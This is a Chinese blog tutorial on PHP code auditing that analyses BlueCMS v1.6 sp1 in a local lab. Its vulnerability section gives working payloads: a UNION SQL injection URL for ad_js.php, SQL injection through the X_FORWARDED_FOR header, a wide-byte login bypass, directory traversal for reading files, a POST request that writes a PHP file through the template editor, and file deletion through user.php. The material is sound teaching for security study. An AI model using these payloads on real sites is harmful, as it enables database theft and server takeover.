通过 BlueCMS 学习 php 代码审计

Delina

原文链接：通过 BlueCMS 学习 php 代码审计
​
0x00 前言
最近一直在学习php代码审计，入门过程比自己想象的慢很多，现在各个行业都在内卷，代码审计随着 web 开发技术的发展也会变得更加复杂。但不管现在技术多成熟，多复杂，基础知识一定要扎实。先记录下我目前学习php代码审计的过程：

• 
  

php基础语法巩固 -> php特性 -> 各漏洞挖掘方法 -> 早期CMS程序代码审计实战 -> MVC模式程序代码审计实战
网上已经有很多讲解如何去审计各种php程序漏洞的博客，大家都讲的很好，但学完这些知识后去真正上手审计一个CMS时，会突然发现自己什么都不会，我总结原因是自己的 web 开发知识太少了，不理解程序的逻辑，导致在审计大量代码时会晕头转向，没有方向。
然后我边学最基础的web开发知识， 边找最简单的 CMS 实战审计，然后逐渐增加难度，慢慢的找到了感觉。目前我认为自己还是一个菜鸡，确实也还是一个菜鸡，所以自己打算好好整理早期CMS程序代码审计实战 -> MVC模式程序代码审计实战的过程，并在博客上发表。
早期CMS程序代码审计实战 我依次选择了 BlueCMS, SeaCMS, DedeCMS, PhpCMS 这 4 个CMS，难度逐渐提升。在对这几个系统的代码审计过程中，也能感受到 web 开发技术的发展和趋势，直到PhpCMS，发现已经实现了一个MVC模型的程序。相信完成这步后再审计非 MVC 模式程序的代码就会具有清晰的思路与十足的把握。
0x01 BlueCMS 简介
BlueCMS 是一款应用于地方分类信息的门户系统，本文下载的源码为 BlueCMS v1.6 sp1版，可以追溯到2010年左右了，该系统确实很老，但审计该系统有一个好处是，即使现在web开发技术十分成熟了，但仍有人因为经验缺乏或时间原因会开发出类似BlueCMS这样简单的系统，甚至比BlueCMS更简单。通过对 BlueCMS 实战审计，能够熟悉这类简单 CMS 的程序逻辑。
BlueCMS 被认为是练手代码审计的绝佳项目，以至于现在百度BlueCMS的关键词全是代码审计。那为什么 BlueCMS 都被审计烂了，我还要在发一篇BlueCMS的代码审计博客呢？首先BlueCMS确实经典，是一个入门的好项目；其次BlueCMS是无MVC架构时期最早流行的一批CMS，是早期CMS程序代码审计实战系列最标志的第一环。
BlueCMS 源码也不太好找，这里推荐站长之家
（http://down.chinaz.com/），yyds
BlueCMS本地部署好后，先访问 /install/index.php 进行安装，感觉过程有点bug，不过返回首页后会发现安装成功。
0x02 全局分析

在学完php的各漏洞代码审计方法后我就直接利用 seay 去扫描代码敏感关键字回溯的方法去审计代码，但在过程中却逐渐蒙圈，经验总结，在审计一个成熟的CMS之间，还是要做好全局分析的工作
目录结构

通过目录结构可以简单看出程序的逻辑
目录结构主要关注入口文件index.php在程序中的位置，BlueCMS时期的程序 index.php 基本位于程序根目录下，其实这是不安全的，会导致整个程序文件被窃取的风险，在审计后面的CMS中会发现这个问题会改善

​

首页 index.php

首页 index.php 首先会加载common.inc.php，include/index.fun.php这些文件具体做了什么后面仔细分析
然后 index.php 就从数据库中获取首页信息，利用smarty模板显示。Smarty是BlueCMS引用的一个成熟的PHP模板引擎，Smarty在那个时期也是很火的，关于Smarty的具体实现代码我们就可以忽略了

1. require_once('include/common.inc.php');
   
2. require_once(BLUE_ROOT.'include/index.fun.php');
   
3. // 获取新闻栏目、新闻分类列表、网站公告等数据
   
4. ……
   
5. // 利用smarty模板引擎显示页面
   
6. $smarty->display('index.htm');

复制代码

可以看出index.php并不能算入口文件，它只是在做一个页面的显示工作，从这里我们大概知道前台是一个多入口的模式，注意多入口的系统需要对每个入口文件单独做安全过滤，它们通常都会加载同一个文件来实现，在BlueCMS中这个文件就是common.inc.phpinclude/common.inc.php

对GPC数据做了过滤，但外部可控数据还包括$_SERVER没有经过过滤
还需要留意的是 comon.inc.php 还做好了数据库连接工作，$db 为连接数据的对象，后续可以直接使用
comon.inc.php 的其他处理逻辑注释即可

1. // 加载一些基础文件
   
2. require_once (BLUE_ROOT.'include/common.fun.php');
   
3. require_once(BLUE_ROOT.'include/cat.fun.php');
   
4. 
   
5. // 外部数据过滤
   
6. if(!get_magic_quotes_gpc())
   
7. {
   
8.     $_POST = deep_addslashes($_POST);
   
9.     $_GET = deep_addslashes($_GET);
   
10.     $_COOKIES = deep_addslashes($_COOKIES);
    
11.     $_REQUEST = deep_addslashes($_REQUEST);
    
12. }
    
13. 
    
14. // 数据库链接
    
15. require_once(BLUE_ROOT.'include/mysql.class.php');
    
16. $db = new mysql($dbhost,$dbuser,$dbpass,$dbname);
    
17. 
    
18. // Smarty模板对象就是这引入的
    
19. require(BLUE_ROOT.'include/smarty/Smarty.class.php');
    
20. $smarty = new Smarty();
    
21. 
    
22. // 用户ip处理
    
23. $banned_ip = get_bannedip();
    
24. if (@in_array($online_ip, $banned_ip))
    
25. {
    
26.     showmsg('对不起，您的IP已被禁止，有问题请联系管理员!');
    
27. }

复制代码

外部数据的具体过滤方式

追踪一下deep_addslashes()方法，看下数据过滤的具体实现方式

/include/common.fun.php

具体过滤函数是addslashes()，在此情况下引号形式的sql注入基本会被过滤，所以凡是加了common.inc.php的入口文件，基本会实现这些过滤操作

1. // include/common.fun.php 14-28:
   
2. function deep_addslashes($str)
   
3. {
   
4.     if(is_array($str))
   
5.     {
   
6.         foreach($str as $key=>$val)
   
7.         {
   
8.             $str[$key] = deep_addslashes($val);
   
9.         }
   
10.     }
    
11.     else
    
12.     {
    
13.         $str = addslashes($str);
    
14.     }
    
15.     return $str;
    
16. }

复制代码

数据库连接方式

include/mysql.class.php

数据库连接方法是mysql_connect()，$linkid存放MySQL 连接标识
这里应该提取到一个十分关键的信息，数据库编码为gbk，那么程序就有宽字节注入的可能
然后会看到mysql类还封装了很多底层sql的执行方法，知道这些方法是干嘛的就行

1. class mysql {
   
2.         var $linkid=null;
   
3.     function __construct($dbhost, $dbuser, $dbpw, $dbname = '', $dbcharset = 'gbk', $connect = 1) {
   
4.         $this -> mysql($dbhost, $dbuser, $dbpw, $dbname, $dbcharset, $connect);
   
5.     }
   
6.     function mysql($dbhost, $dbuser, $dbpw, $dbname = '', $dbcharset = 'gbk', $connect=1){
   
7.         $func = empty($connect) ? 'mysql_pconnect' : 'mysql_connect';
   
8.         if(!$this->linkid = @$func($dbhost, $dbuser, $dbpw, true)){
   
9.             $this->dbshow('Can not connect to Mysql!');
   
10.         } else {
    
11.             if($this->dbversion() > '4.1'){
    
12.                 mysql_query( "SET NAMES gbk");
    
13.             }
    
14.         }
    
15.     }
    
16.       // mysql_query()封装执行sql语句的方法
    
17.       function query($sql){
    
18.         if(!$query=@mysql_query($sql, $this->linkid)){
    
19.             $this->dbshow("Query error:$sql");
    
20.         }else{
    
21.             return $query;
    
22.         }
    
23.     }
    
24.       //    getone() 封装查询数据的方法
    
25.       function getone($sql, $type=MYSQL_ASSOC){
    
26.         $query = $this->query($sql,$this->linkid);
    
27.         $row = mysql_fetch_array($query, $type);
    
28.         return $row;
    
29.     }
    
30.   ……
    
31. }

复制代码

后台逻辑分析后台一般只有通过身份验证后才能访问，提前就有一层安全保障，但后台程序一般都是漏洞百出，我们很多时候只有靠后台才能拿到服务器的shell。这里具体分析一下BlueCMS的后台逻辑
后台入口文件

admin/index.php

admin/index.php 的大部分逻辑由 admin/include/common.inc.php 处理

1. index.php 剩下内容主要用于显示后台的页面
   
2. require_once(dirname(__FILE__) . "/include/common.inc.php");
   
3. $act=!empty($_REQUEST['act']) ? trim($_REQUEST['act']) : '';
   
4. if($act==''){
   
5.   // 显示后台页面
   
6.   $smarty->display('index.htm');
   
7. }
   
8. elseif($act=='top')
   
9. {
   
10.     // 显示顶部
    
11.     $smarty->display('top.htm');
    
12. }
    
13. elseif($act=='menu'){
    
14.   // 显示菜单
    
15.   $smarty->display('menu.htm');
    
16. }
    
17. elseif($act == 'main'){
    
18.   // 显示主体页面
    
19.   $smarty->display('main.htm');
    
20. }

复制代码

admin/templates/default/index.htm关注 index.htm 可以知道后台是通过frame来实现的，这样后台程序的所有功能都可以依附在index.php下实现，在早期的CMS中，基本都是这种实现方案

1. <frameset rows="76,*" frameborder="no" border="0" framespacing="0" >
   
2.         <frame src="index.php?act=top" name="topFrame" id="topFrame" scrolling="no" noresize>
   
3.         <frameset cols="176,*" name="bodyFrame" id="bodyFrame" frameborder="no" border="0" framespacing="0"  >
   
4.             <frame src="index.php?act=menu" name="menuFrame" id="menuFrame" scrolling="yes" noresize>
   
5.             <frame src="index.php?act=main" name="mainFrame" id="mainFrame" scrolling="auto" noresize>
   
6.         </frameset>
   
7. </frameset>

复制代码

common.inc.php处理细节

admin/include/common.inc.php

该文件内容和 include/common.inc.php 差不多，不同之处在于多了管理员的认证，如果看到加载了 include/common.inc.php 的文件，那么该文件基本为后台访问页面

可以看到 BlueCMS 主要通过session的方法认证用户登陆状态，如果$_SESSION[‘admin_id’]存在则通过验证并刷新用户登陆记录
当前用户 session 信息为空时则会判断用户的cookie信息，如果设置了cookie信息则判断cookie的账号密码是否能登陆
如果未设置cookie信息，则跳转到login.php?act=login页面重新登陆

1. // 加载一些基础文件
   
2. require_once(……)
   
3. // 外部数据过滤
   
4. deep_addslashes()
   
5. // 数据库链接
   
6. require_once(BLUE_ROOT.'include/mysql.class.php');
   
7. $db = new mysql($dbhost,$dbuser,$dbpass,$dbname);
   
8. // 加载smarty模板引擎
   
9. require(BLUE_ROOT.'include/smarty/Smarty.class.php');
   
10. $smarty = new Smarty();
    
11. // 管理员身份认证
    
12. if(empty($_SESSION['admin_id']) && $_REQUEST['act'] != 'login' && $_REQUEST['act'] != 'do_login' && $_REQUEST['act'] != 'logout'){
    
13.     if($_COOKIE['Blue']['admin_id'] && $_COOKIE['Blue']['admin_name'] && $_COOKIE['Blue']['admin_pwd']){
    
14.         if(check_cookie($_COOKIE['Blue']['admin_name'], $_COOKIE['Blue']['admin_pwd'])){
    
15.           update_admin_info($_COOKIE['Blue']['admin_name']);
    
16.         }
    
17.     }else{
    
18.         setcookie("Blue[admin_id]", '', 1, $cookiepath, $cookiedomain);
    
19.         setcookie("Blue[admin_name]", '', 1, $cookiepath, $cookiedomain);
    
20.         setcookie("Blue[admin_pwd]", '', 1, $cookiepath, $cookiedomain);
    
21.         echo '<script type="text/javascript">top.location="login.php?act=login";</script>';
    
22.         exit();
    
23.     }
    
24. }elseif($_SESSION['admin_id']){
    
25.      update_admin_info($_SESSION['admin_name']);
    
26. }

复制代码

0x03 漏洞审计
sql注入漏洞
通过BlueCMS我们可以看到各种常见的漏洞写法
数字型注入

ad_js.php

ad_js.php 加载了common.inc.php，会对GPC数据做 addslashes() 过滤
$ad_id通过 $_GET 方式获取，会自动经过一层过滤，最终传入到sql语句执行
在执行的sql语句中发现$ad_id没有引号包裹，而且没有做数字型判断，那么这里很有可能存在数字型sql注入
sql查询结果最后是用注释的方式放在页面上
​​

1. require_once dirname(__FILE__) . '/include/common.inc.php';
   
2. $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
   
3. $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
   
4. if($ad['time_set'] == 0)
   
5. {
   
6.     $ad_content = $ad['content'];
   
7. }
   
8. echo "<!--\r\ndocument.write("".$ad_content."");\r\n-->\r\n";
   
9. 复现漏洞时我是想利用报错注入快一点，但没有成功，奇怪，下面用union注入复现：
   
10. http://bluecms.test:8888/ad_js.php?ad_id=0 union select 1,2,3,4,5,6,version()--+

复制代码

​

$_SERVER 的突破
上面知道只对GPC数据做了全局过滤，还有一个$_SERVER是没有过滤的，其实$_SERVER也是可以传入外部可控数据的

guest_book.php

guest_book.php 是一个处理用户留言功能的模块，但用户发送留言时，会同时把用户留言的ip地址一起放到数据库中
其中$online_ip来自 common.fun.php 中 getip() 函数

1. require dirname(__FILE__) . '/include/common.inc.php';
   
2. if ($act == 'list'){
   
3.   ……
   
4. }elseif($act == 'send'){
   
5.   $sql = "INSERT INTO " . table('guest_book') . " (id, rid, user_id, add_time, ip, content)
   
6.             VALUES ('', '$rid', '$user_id', '$timestamp', '$online_ip', '$content')";
   
7.     $db->query($sql);
   
8. }

复制代码

common.fun.phpgetip() 首先会在HTTP_开头的环境变量寻找ip，HTTP_开头的变量是可控的，来自请求头

1. function getip()
   
2. {
   
3.     if (getenv('HTTP_CLIENT_IP'))
   
4.     {
   
5.         $ip = getenv('HTTP_CLIENT_IP');
   
6.     }
   
7.     elseif (getenv('HTTP_X_FORWARDED_FOR'))
   
8.     {
   
9.         $ip = getenv('HTTP_X_FORWARDED_FOR');
   
10.     }
    
11.     ……
    
12.   else
    
13.     {
    
14.         $ip = $_SERVER['REMOTE_ADDR'];
    
15.     }
    
16.   return $ip;
    
17. }

复制代码

漏洞复现：

1. 
   
2. POST /guest_book.php HTTP/1.1
   
3. Host: bluecms:8888
   
4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
   
5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
   
6. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   
7. Accept-Encoding: gzip, deflate
   
8. Content-Type: application/x-www-form-urlencoded
   
9. X_FORWARDED_FOR: 192.168.44.1',user())#
   
10. Connection: close
    
11. Cookie: PHPSESSID=8d9d7ed9da5a96ac9b0093dceed684f9
    
12. Upgrade-Insecure-Requests: 1
    
13. Content-Length: 37
    
14. 
    
15. content=hello&act=send&page_id=1&rid=

复制代码

效果：​
​

​

​宽字节注入
上面有提到这一点，因为程序在数据库链接处设置了GBK编码，利用宽字节注入可以绕过程序过滤，所以BlueCMS的sql注入基本都有存在，下面就找一个地方验证一下

admin/login.php

admin/login.php 是后台管理员登陆页面，如果这里存在sql注入常见的利用方式就是注入万能密码
可以看到后台验证验证用户是否登陆的依据：具有非空$_SESSION[‘admin_id’]值
$admin_name 和 $admin_pwd 通过post获取，post数据会通过addslashs()函数过滤。验证的关键函数为check_admin()

1. require_once(dirname(__FILE__) . '/include/common.inc.php');
   
2. if($act == 'login'){
   
3.   if($_SESSION['admin_id']){
   
4.          showmsg('您已登录，不用再次登录', 'index.php');
   
5.      }
   
6.   ……
   
7. }elseif($act == 'do_login'){
   
8.   $admin_name = isset($_POST['admin_name']) ? trim($_POST['admin_name']) : '';
   
9.     $admin_pwd = isset($_POST['admin_pwd']) ? trim($_POST['admin_pwd']) : '';
   
10.     if(check_admin($admin_name, $admin_pwd)){
    
11.          update_admin_info($admin_name);
    
12.          if($remember == 1){
    
13.              setcookie('Blue[admin_id]', $_SESSION['admin_id'], time()+86400);
    
14.              setcookie('Blue[admin_name]', $admin_name, time()+86400);
    
15.             setcookie('Blue[admin_pwd]', md5(md5($admin_pwd).$_CFG['cookie_hash']), time()+86400);
    
16.          }
    
17.      }else{
    
18.          showmsg('您输入的用户名和密码有误');
    
19.      }
    
20. }

复制代码

admin/include/common.fun.php判断的依据是同时查询用户名和密码，查询到结果则为真

1. function check_admin($name, $pwd)
   
2. {
   
3.     global $db;
   
4.     $row = $db->getone("SELECT COUNT(*) AS num FROM ".table('admin')." WHERE admin_name='$name' and pwd = md5('$pwd')");
   
5.      if($row['num'] > 0)
   
6.      {
   
7.          return true;
   
8.      }
   
9.      else
   
10.      {
    
11.          return false;
    
12.      }
    
13. }

复制代码

这里我们的宽字节利用不就来了，注入永真的sql语句，我们就绕过了前台的限制注意浏览器会自动对post数据url编码，我们注入的%会被编码导致注入宽字节失效，最好通过抓包取消url编码

​

任意文件读取/写入

在 BlueCMS 后台处有一个编辑模板的功能，对于这种功能，安全小伙应该保持敏感，这里会出现读取和写入的操作，很有可能就存在任意文件读取/写入漏洞

​
​

​​
​

​审计细节

admin/tpl_manage.php

1. require_once(dirname(__FILE__).'/include/common.inc.php');
   
2. $act = !empty($_REQUEST['act']) ? trim($_REQUEST['act']) : 'list';
   
3. if($act == 'list'){
   
4.   $dir = BLUE_ROOT.'templates/default';
   
5.   // 列出$dir下的文件
   
6.     ……
   
7. }
   
8. elseif($act == 'edit'){
   
9.   $file = $_GET['tpl_name'];
   
10.     if(!$handle = @fopen(BLUE_ROOT.'templates/default/'.$file, 'rb')){
    
11.         showmsg('打开目标模板文件失败');
    
12.     }
    
13.     $tpl['content'] = fread($handle, filesize(BLUE_ROOT.'templates/default/'.$file));
    
14.     $tpl['content'] = htmlentities($tpl['content'], ENT_QUOTES, GB2312);
    
15.     fclose($handle);
    
16.     $tpl['name'] = $file;
    
17.     template_assign(array('current_act', 'tpl'), array('编辑模板', $tpl));
    
18.     $smarty->display('tpl_info.htm');
    
19. }
    
20. elseif($act == 'do_edit'){
    
21.     $tpl_name = !empty($_POST['tpl_name']) ? trim($_POST['tpl_name']) : '';
    
22.      $tpl_content = !empty($_POST['tpl_content']) ? deep_stripslashes($_POST['tpl_content']) : '';
    
23.      if(empty($tpl_name)){
    
24.          return false;
    
25.      }
    
26.      $tpl = BLUE_ROOT.'templates/default/'.$tpl_name;
    
27.      if(!$handle = @fopen($tpl, 'wb')){
    
28.         showmsg("打开目标模版文件 $tpl 失败");
    
29.      }
    
30.      if(fwrite($handle, $tpl_content) === false){
    
31.          showmsg('写入目标 $tpl 失败');
    
32.      }
    
33.      fclose($handle);
    
34.      showmsg('编辑模板成功', 'tpl_manage.php');
    
35. }

复制代码

$act可控，用于指定操作，具有的操作为list, edit 和do_edit默认操作 list，列出指定目录下的文件
操作 edit用于读取指定目录下的$file，该参数可控，通过../可以实现目录穿越，这里就有任意文件读取漏洞
操作 do_edit 将$tpl_content写入到$tpl_name文件中，两个参数都可控，不过写入的内容$tpl_content会通过 deep_stripslashes() 过滤，同时还要注意$tpl_content是通过 POST 方式传入的，还会经过 addslashes() 处理

include/common.fun.php

查看 deep_stripslashes() ，其实就是使用 stripslashes() 来消除 addslashes() 的影响，所以这里我们输入的内容完全可控，这里将同时存在任意文件读取和写入的漏洞

1. function deep_stripslashes($str)
   
2. {
   
3.      if(is_array($str))
   
4.      {
   
5.          foreach($str as $key => $val)
   
6.          {
   
7.              $str[$key] = deep_stripslashes($val);
   
8.          }
   
9.      }
   
10.      else
    
11.      {
    
12.          $str = stripslashes($str);
    
13.      }
    
14.      return $str;
    
15. }

复制代码

复现
利用目录穿越读取任意文件

​

直接构造一个post请求修改一个不存在的文件，这样将会创建一个文件并写入，poc如下：

1. POST /admin/tpl_manage.php HTTP/1.1
   
2. Host: bluecms.test:8888
   
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
   
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
   
5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   
6. Accept-Encoding: gzip, deflate
   
7. Content-Type: application/x-www-form-urlencoded
   
8. Content-Length: 59
   
9. Origin: http://bluecms.test:8888
   
10. Connection: close
    
11. Referer: http://bluecms.test:8888/admin/tpl_manage.php?act=edit&tpl_name=news_info.htm
    
12. Cookie: PHPSESSID=bb499d4e1bddb4c5b2c6cd16c39e5c77
    
13. Upgrade-Insecure-Requests: 1
    
14. 
    
15. tpl_content=<?php phpinfo();?>&tpl_name=php.php&act=do_edit

复制代码

效果：
​

​

​任意文件删除

user.php

$id 可控，直接传入unlink()会可造成任意文件删除漏洞。不过在unlink()操作前会执行一条sql语句，BlueCMS 初始数据库是没有company_image表的，导致数据库报错是执行不到unlink()操作的

1. elseif ($act == 'del_pic') {
   
2.     $id = $_REQUEST['id'];
   
3.     $db->query("DELETE FROM " . table('company_image') . " WHERE path='$id'");
   
4.     if (file_exists(BLUE_ROOT . $id)) {
   
5.         @unlink(BLUE_ROOT . $id);
   
6.     }

复制代码

0x04 总结BlueCMS 总体代码比较简单，出现的漏洞也比较典型，没有什么特别之处。另外本文并没有针对 XSS 漏洞做审计，对于这种简单的系统使用黑盒测试的方法似乎要更快一点。
​